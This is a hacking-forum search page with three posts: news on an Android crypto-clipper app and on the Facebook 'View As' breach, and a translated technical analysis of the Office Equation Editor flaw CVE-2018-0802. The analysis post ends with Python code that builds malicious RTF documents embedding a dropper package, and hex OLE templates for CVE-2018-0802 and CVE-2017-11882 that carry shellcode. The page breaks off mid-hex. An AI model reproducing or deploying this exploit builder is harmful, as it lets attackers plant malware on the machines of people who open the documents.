Search the Community

Showing results for tags 'first'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Cracking Zone
    • Cracking Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
    • Windows Phone
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Premium Accounts
    • Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Cracking Zone PRIV8
    • Cracking Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Location


Interests


Occupation


TeamViewer


Tox

Found 3 results

  1. First Android Clipboard Hijacking Crypto Malware Found On Google Play Store February 11, 2019Swati Khandelwal A security researcher has discovered yet another cryptocurrency-stealing malware on the official Google Play Store that was designed to secretly steal bitcoin and cryptocurrency from unwitting users. The malware, described as a "Clipper," masqueraded as a legitimate cryptocurrency app and worked by replacing cryptocurrency wallet addresses copied into the Android clipboard with one belonging to attackers, ESET researcher Lukas Stefanko explained in a blog post. Since cryptocurrency wallet addresses are made up of long strings of characters for security reasons, users usually prefer copying and pasting the wallet addresses using the clipboard over typing them out. The newly discovered clipper malware, dubbed Android/Clipper.C by ESET, took advantage of this behavior to steal users cryptocurrency. To do this, attackers first tricked users into installing the malicious app that impersonated a legitimate cryptocurrency service called MetaMask, claiming to let users run Ethereum decentralized apps in their web browsers without having to run a full Ethereum node. Officially, the legitimate version of MetaMask is only available as a web browser extension for Chrome, Firefox, Opera, or Brave, and is not yet launched on any mobile app stores. However, Stefanko spotted the malicious MetaMask app on Play Store targeting users who want to use the mobile version of the service by changing their legitimate cryptocurrency wallet address to the hacker's own address via the clipboard. As a result, users who intended to transfer funds into a cryptocurrency wallet of their choice would instead make a deposit into the attacker's wallet address pasted by the malicious app. Stefanko spotted the malicious MetaMask app, which he believes was the first Android Trojan Clipper to be discovered on Play Store, shortly after its introduction to the app store on February 1. Google took down the malicious app almost immediately after being notified by the researcher. While the bitcoin price has been dropped steadily since hitting its all-time high in December 2017, there is no reduction (in fact rise) in the cryptocurrency scandals, thefts, and scams that continue to plague the industry. Just last week, The Hacker News reported how customers of the largest Canadian bitcoin exchange QuadrigaCX lost $145 million in cryptocurrency after the sudden death of its owner who was the only one with access to the company's cold (offline) storage wallets. However, some users and researchers are suggesting the incident could be an exit scam.
  2. Facebook discovered it on Tuesday afternoon but did not inform its users until Friday night that the company had suffered the biggest hack in its history in which at least 50 million accounts have been compromised . Last Tuesday, the company informed the FBI and the Irish Data Protection Commission - in charge of ensuring the European regulation of data protection - of a breach in its security system whose origin and mobile were unknown to them . Facebook took two days, until Thursday night, to solve their security problem .However, the internal investigation is still open and the company does not know if "the accounts were misused", according to the CEO of the company, Mark Zuckerberg, in a message on his social network. Notification that users have received in their Facebook profile affected by the hack. "On Tuesday, I assumed that an attacker had exploited a technical vulnerability to steal access to more than 50 million accounts," he said. A fact that, after jumping to public opinion, Zuckerberg himself has described as " a very serious security issue " that "they are taking very seriously" in statements to the American media. According to the company, the hackers were taking advantage of the functionality of "see as" -that allows the owner of an account to know what his profile looks like in the eyes of a third person- to take over and take control of the accounts of third parties . In response to this attack, Facebook has chosen to reset the accounts of 90 million users around the world, who will have to re-enter their username and password to regain access to their account. In addition to the 50 million accounts that have been exposed by the security breach , the company has decided to reset by precaution the accounts of another 40 million users who would have accessed the "see as" function over the past year. A hack at the worst moment for Facebook This hack has come at the worst possible time for Facebook . After its last presentation of results in July, the company's shares plummeted 21% to stand at around $ 170. The stock market crash came precipitated by a growth of 1.44% during the last quarter, a figure well below those that had been harvested during the last years. In addition, Facebook faces a serious leak of users in the United States.According to the latest survey of the Pew Research Center, 25% of users would have already been removed from this social network . A percentage that, in the youngest age group, rises to 44%. What should I do to secure my passwords? The most important thing to avoid someone sneaking into your Facebook account is to have a very secure password. You should not include your name, predictable numbers - such as birth dates - or common words or words that can easily be associated with you. If you want to create a very secure password and always remember it, here is a small guide to do it so that nobody knows how your account is protected. In addition, Facebook offers the option to activate verification in two steps .This system of 'defense' extra that requires a code that is generated randomly and sent by message to a phone number, in addition to having to write our username and password . So, even if someone knows your Instagram credentials and tries to access from your mobile or computer, you can not enter your account unless you also have your phone and receive the SMS with the code . It is highly recommended to activate verification in two steps, both on Facebook and any other service that offers it, be it WhatsApp, Instagram, Gmail or others.
  3. Introduction The Microsoft Security Patch of January 2018 fixes the Office 0day vulnerability (CVE-2018-0802) captured by the 360 Core Security Advanced Threat Response Team. This vulnerability affects almost all versions of Office that Microsoft currently supports.This is the second outbreak of high-level threats using zero-day loopholes since 360's first global interception of the Office 0day vulnerability (CVE-2017-11826).The 360 core security team has been actively communicating with Microsoft and working together to promote the repair of the 0day loophole so that the vulnerability can be properly resolved before disclosure of vulnerability information.The technical principle of the vulnerability is similar to the 17-year-old "Dream Formula" loophole (CVE-2017-11882). It is a re-initiated attack by the hacker using the EQNEDT32.EXE embedded in the office's embedded equation editor. We call it "Nightmare". Formula II (CVE-2018-0802). Attack process analysis We captured several in-field attacks of "Dream Formula II". The on-the-spot samples were embedded with two formulae objects using Nday and 0day loopholes. At the same time, Nday loopholes can attack unpatched systems, and 0day loopholes attack all patches. The system bypasses the ASLR (Address Randomization) security measures of the CVE-2017-11882 patch, and the attack will eventually implant a malicious remote control program on the user's computer. Figure: "Dream Formula II" in the wild sample attack process Vulnerability analysis "Dream Formula II" is a patch bypass vulnerability of CVE-2017-11882. The type is stack overflow. The root cause is Microsoft's stack overflow in the "Dream Formula Generation" patch that does not fix the copy of the font FaceName.This vulnerability will only cause a crash on an unpatched version, but it can be perfectly utilized on a patched version.Below we analyze the CVE-2018-0802 vulnerability by poc samples. Static analysis As with CVE-2017-11882, the trigger data for this vulnerability is within the "Equation Native" stream of the extracted OLE object.The red coiled portion in Figure 1 is core data with a total of 0x99 = 153 bytes.0×08 represents the font tag, followed by 00 01 respectively represents the typeface and style of the font, and the area from 33 to 25 00 is the name of the Font, which is the data copied when the stack overflows.This part of the data contains shellcode, bypass ASLR tricks, process command lines, and related data for padding. We will analyze them later. figure 1 Equation Native data structure According to information published online, the entire "EquationNative" data structure is: MTEFData = MTEF header + MTEF Byte Stream. The structure of QNOLEFILEHDR is shown in Figure 2: figure 2 The structure of the MTEF header is shown in Table 1. Regarding this structure, there are differences between the actual data and the format specifications that we observed. The following table shows the actual observations: Offset Instructions value 0 MTEF version number 0×03 1 The data generation platform 0x00 is generated on Macintosh platform, 0x01 is generated on Windows platform 2 Generated product of this data 0×00 is generated by MathType, 0×01 is generated by Equation Editor 3 Product major version number 0×03 4 Product minor version number 0x0A Table 1 In the attack sample, the MTEF ByteStream structure is shown in Table 2: Initial SIZE record FONT records FONT content Remaining data Table 2 The FONT record and FONT content structure are shown in Table 3: member Instructions Note Tag 0×08 1 byte Tface Typeface number 1 byte Style Font style 1 byte Name Font name NULL-terminated ASCII string table 3 Patch bypass analysis CVE-2018-0802 vulnerability trigger point is located in sub_21E39 (module address is set to 0 in the IDA), as shown in Figure 3, it can be seen that the function of the function is to initialize a LOGFONT structure according to the font data in the formula : image 3 Let's take a look at Microsoft's description of the LOGFONT structure (Figure 4).You can see that the last member of this structure is lfFaceName, Figure 4: LOGFONT Structure Let's take another look at Microsoft's description of the lfFaceName member (Figure 5).You can see that lfFaceName represents the typeface name of the font. On the version being analyzed, it is a null-terminated char string with a maximum length of 32, which contains the terminator NULL. Figure 5 The problem is obvious: the code in the red box in Figure 3 does not limit the copy length when copying the font FaceName, and the source data for the copy is the user-supplied font name, and the destination address is a LOGFONT structure body address passed in from the parent function.We look back to the parent function of sub_21E39 (Figure 6), you can see this address is located on the stack opened by the parent function, is a local variable of the parent function.The attacker constructs malicious data, overwrites the last two bytes of the return address of the parent function (sub_21774), and then directs the control flow to the shellcode on the stack. Figure 6 During the analysis, we found a place of suspected recursion. Figure 7 shows the disassembly code of sub_21774. We can see that sub_21774 first calls the vulnerability function sub_21E39 to initialize a LOGFONT structure, and then calls the relevant API to pass in the structure. The system gets a font name saved to Name.Then, it compares the obtained Name with the user-supplied lpLogFont. If it is inconsistent (and the sub_115A7 function needs to return False), it will continue to call or not call itself according to the condition specified by a3, while a3 is the third of sub_21E39 function. Parameters. Figure 7 Let's take a look at the third parameters of the parameters, otherwise there may be multiple recursive, can not effectively use this overflow.According to the previous CVE-2017-11882 debugging results (Figure 8), we can see that when parsing the user-supplied font data, the function calling sub_21774 is sub_214C6.Let's look back at sub_214C6 (Figure 9). Sub_214C6 calls sub_21774 to pass a value of 1 to the third parameter, so if(a3) in Figure 7 is true.Let's look at Figure 7, when sub_21774 recursively calls itself, the value passed to the 3rd parameter is 0, which means that sub_21774 will not call itself again, and the recursion level will only have 1 level.Analyzed here, recursive doubts have been solved. Figure 8: CVE-2017-11882 Triggered Execution Flow Figure 9 One problem that has been analyzed here is that if _strcmpi(lpLogfont, &Name) is not true (if the font data is forged by the user, it certainly does not hold here), sub_115A7 will be called, which means that it will go to CVE-2017. -11882 overflow point.In the version without the November patch, if you want to successfully use CVE-2017-11882, CVE-2018-0802 points will not overflow because the former needs to have a much smaller overflow size than the latter, and the copy last has a NULL truncation (we know that the controllable eip that overflows to CVE-2017-11882 requires only 0x2C bytes, and through the analysis below (Figure 11) we can see that the controllable eip overflowing to CVE-2018-0802 requires 0x 94 bytes).On the other hand, if you want to trigger CVE-2018-0802 on a version that does not have an November patch, CVE-2017-11882 will be triggered first.In short, CVE-2018-0802 is not available on the pre-11 patch. However, as can be seen from Figure 10, in the November patch, before the copy of CVE-2017-11882 overflow point, Microsoft performed a length limit of 0x20 on the copy length, and after the copy was completed, it was manually copied at the end of the copy. A NULL was added to invalidate CVE-2017-11882.This directly leads to CVE-2018-0802 being unusable before patching!Now, as long as sub_115A7 returns False, the exploit can be perfectly exploited, and actual debugging finds that sub_115A7 returns False. Figure 10 Dynamic Analysis Spillover data copy With the above analysis, dynamic analysis becomes very simple.Since this overflow point will copy the data, let's monitor the source string and the corresponding stack traceback for each copy. We first enter the OLE data-related Load function (sub_6881), and then break the point before copying the data and proceed. Output, the result is shown in the code: It can be seen from the log that there are two copies, and we can know from the stack trace back that these two copies are the two calls to sub_21174 in the static analysis.The first time is the sub_214c6 call to sub_21174, and the second is the sub_21174 call to itself.It can be seen that the stack overflow obviously occurs on the first copy.Here to mention a little bit, cb ce cc e5 stands for Songs. Let us calculate in detail how much length we need to overflow to control the return address of the parent function (sub_21174). (The conclusion of this question has been mentioned in the “Patch bypass analysis” section). From Figure 11 we can see from lfFaceName(-0× 90) Overflow to ret_addr (+0x4), a total of 0x94 bytes are required. Exceeding the 0x94 portion of the byte will cover the return address one by one from the low address. Figure 11 We look at the data in the POC. As shown in Figure 12, the blue part is the first 0x94 bytes of the overflow, the 2500 is the last two bytes of the overflow, and 00 is the terminator. When the copy encounters 00 Stop.According to the little end address layout, when the poc is running, the EIP will only cover the lower 2 bytes.Why did you do this?The answer is to bypass ASLR. Figure 12 Bypass ASLR Let's take a look at why two bytes of a district can bypass ASLR. First of all, we must be clear that the patch file is opened ASLR, as shown in Figure 13.As a result, the base address for loading EQNEDT32.EXE is random each time, so the first problem to be considered when overflowing is how to bypass ASLR.(As for DEP, you can see from Figure 14 that DEQ is not enabled in EQNEDT32.EXE in the patch file, so it is not necessary to consider DEP under normal circumstances) Unfortunately, attackers clearly understand the Windows system mechanisms and defenses.Because on the Windows platform, the ASLR of a 32-bit process only randomizes the upper 2 bytes of the address each time, while the lower 2 bytes remain unchanged.If a ret instruction can be found in the same low 0xFFFF space of the covered address, and the address is 0xABCD00XY (where ABCD and XY are 6 arbitrary hexadecimal numbers, the second to last byte in the address Must be 0x00, because after the copy needs to be accurately truncated, you can directly use this ret to jump to the stack.Since there is no need to bypass DEP, shellcode can be executed directly on the stack. Figure 13: ASLR Status of EQNEDT32.EXE is Enabled and DEP is Non-Permanent DEP Figure 14: DEP Status of EQNEDT32.EXE is Disabled More unfortunately, within the EQNEDT32.EXE module, Microsoft really gave and gave only one such address (Figure 15). There are only one address that satisfies the condition, namely, 20025, two bytes that are covered in the eip. 25 00 is unique, there is no second ret that satisfies the condition. Figure 15 Let's consider what the original return address of sub_21174 is.Of course, sub_214C6 calls the address of the next instruction of sub_21174. It can be seen from Fig. 16 that the offset of this address is 214E2. According to the overlay of Fig. 12, the offset after the overlay becomes 20025, which consists of the above analysis and Fig. 17 As you can see, this address is a ret instruction.This instruction will pop up sub_214C6 to the first parameter of sub_21174 and switch the control flow to this value to execute.To make matters worse, this first parameter happens to be lpLogFont, which is the FontName provided by the user.So after ret is executed, the control flow will be transferred to the stack and it will just start executing the first byte of the user-supplied FontName. Figure 16 Figure 17 Sample A Shellcode Analysis In poc for sample A transformation, control flow hijacking and execution of the shellcode section are shown in Figure 18: Figure 18: Due to the existence of recursion, we need to return twice from the sub_21774 function, which explains the first two rets Immediately after the jmpeax instruction, WinExec is called, and the command line parameter happens to be calc.exe, as shown in Figure 19: Figure 19 Sample B Shellcode Analysis Sample B bypasses ASLR in the same way as Sample A, but the shellcode portion is not the same as Sample A.Sample B's shellcode finds the kernel32.dll export table (Figures 20 and 21) through the PEB, and then searches through the export table for a hash of the desired function through a specific hash algorithm (Figure 21). The hash value is given in shellcode.The shellcode then saves the searched function address to where the hash value was previously stored (Figure 22). Figure 20: Hash value and copy path name given in sample B's shellcode Figure 21: Finding the required function in the export table of kernel32.dll with the hash value Figure 22: Comparison of data on the stack before and after finding the function address After successfully finding the function and saving the address on the stack, first call the ExpandEnvironmentStringsA function to expand the short path (the short path is saved in the shellcode), and then call CopyFileA to copy the payload to the word plugin directory so that the payload will follow the word next time. Start automatically loaded into memory.Finally call ExitProcess to exit the Equation Editor process (Figure 23).The entire process does not affect the normal opening of the document. Figure 23: Expand the short path, copy the file, and exit the process to sum up The 0day vulnerabilities used by "CVE-2018-0802" are called CVE-2017-11882's twin vulnerabilities. One vulnerability in the attack sample is for unpatched systems, and the other is for vulnerabilities. The system uses two OLEs to attack at the same time. The hackers' well-constructed attacks are perfectly compatible with the different circumstances of the system vulnerability patch environment.The use of this loophole and the Bypass ASLR approach have a certain degree of coincidence, if there is no ret instruction in the EQNEDT32.EXE module can be used to bypass the ASLR, if lpLogFont is not the first parameter of sub_21774, if CVE - 2017-11882 patch repair method forced DEP protection, "Dream Formula II" will not have the opportunity. The latest 360 security products have been able to detect and prevent this zero-day vulnerability, and we recommend that users update the Microsoft Security Patch for January 2018. reference [Hidden Content] Code .py import argparse import os import struct class Package(object): """ Packager spec based on: [Hidden Content] Dropping method by Haifei Li: [Hidden Content] Found being used itw by @MalwareParty: [Hidden Content] """ def __init__(self, filename): self.filename = os.path.basename(filename) self.fakepath = 'C:\\fakepath\\{}'.format(self.filename) self.orgpath = self.fakepath self.datapath = self.fakepath with open(filename,'rb') as f: self.data = f.read() self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata " self.OBJ_TAIL = r"0105000000000000}}" def get_object_header(self): OLEVersion = '01050000' FormatID = '02000000' ClassName = 'Package' szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex') szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex') return ''.join([ OLEVersion, FormatID, szClassName, ClassName.encode('hex') + '00', '00000000', '00000000', szPackageData, ]) def get_package_data(self): StreamHeader = '0200' Label = self.filename.encode('hex') + '00' OrgPath = self.orgpath.encode('hex') + '00' UType = '00000300' DataPath = self.datapath.encode('hex') + '00' DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex') DataLen = struct.pack("<I", len(self.data)).encode('hex') Data = self.data.encode('hex') OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex') OrgPathW = self.datapath.encode('utf-16le').encode('hex') LabelLen = struct.pack("<I", len(self.filename)).encode('hex') LabelW = self.filename.encode('utf-16le').encode('hex') DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex') DefPathW = self.orgpath.encode('utf-16le').encode('hex') return ''.join([ StreamHeader, Label, OrgPath, UType, DataPathLen, DataPath, DataLen, Data, OrgPathWLen, OrgPathW, LabelLen, LabelW, DefPathWLen, DefPathW, ]) def build_package(self): return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}} {\*\generator Riched20 6.3.9600}\viewkind4\uc1 \pard\sa200\sl276\slmult1\f0\fs22\lang9""" RTF_TRAILER = R"""\par} """ OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """ OBJECT_TRAILER = R""" }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300 00000000 }}} """ OBJDATA_TEMPLATE_0802 = R""" 01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1 B11AE1000000000000000000000000000000003E000300FEFF090006000000000000000000000001 0000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05 000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E0074007200790000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C0000000000000460000000000 00000000000000B024837CC473D30103000000C00300000000000001004F006C0065000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000 0000000000000000000000000000000000000000000000000000001400000000000000010043006F 006D0070004F0062006A000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000120002010100000004000000FFFFFFFF0000000000 00000000000000000000000000000000000000000000000000000000000000010000006600000000 00000003004F0062006A0049006E0066006F00000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000012000201FFFFFFFFFFFFFFFFFF FFFFFF00000000000000000000000000000000000000000000000000000000000000000000000003 0000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008 00000009000000FEFFFFFFFEFFFFFF0C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFF01000002000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02 CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E 30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000 00000000000000000000000000000000000000000000000000000000000000000000000000030004 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF01 000000000000007C010000040100003C0100000100090000039E00000002001C0000000000050000 0009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000 000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFF FFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB 0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F 2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202002004F006C 00650050007200650073003000300030000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000180002000300000005000000FFFFFFFF0000000000 00000000000000000000000000000000000000000000000000000000000000040000007E01000000 0000005200690063006800450064006900740046006C006100670073000000000000000000000000 0000000000000000000000000000000000000000000000000000001C000201FFFFFFFF06000000FF FFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A 0000000C000000000000004500710075006100740069006F006E0020004E00610074006900760065 000000000000000000000000000000000000000000000000000000000000000000000020000200FF FFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000 000000000000000B000000C500000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000020000A00000026060F000A00FF FFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D00 0048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F00100 000300000000000000000000000000000000000000000000004E414E490000000000000100000000 00000001000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000001C00000002009EC4A900000000000000C8A75C00C4 EE5B0000000000030100030A0A08000133C0508D44245250EB7F2020202020202020202020202020 20202020202020202020202020202020202020202020202020202020202020202020202020202020 20202020202020202020202020202020202020202020202020202020202020202020202020202020 202020202020202020202020202020202020202020202020202020202020202026908B44242C662D 51A8FFE0250000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550 494354007C010000FCFEFFFF4401000008007C01040100000100090000039E00000002001C000000 00000500000009020000000005000000020101000000050000000102FFFFFF00050000002E011800 0000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF00001000 0000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D6174685479706500002000 1C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00 FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A60011000030000002020 20000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC020000 00000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE218000400 00002D01010004000000F0010000030000000000 """ OBJDATA_TEMPLATE_11882 = R""" 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1 b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 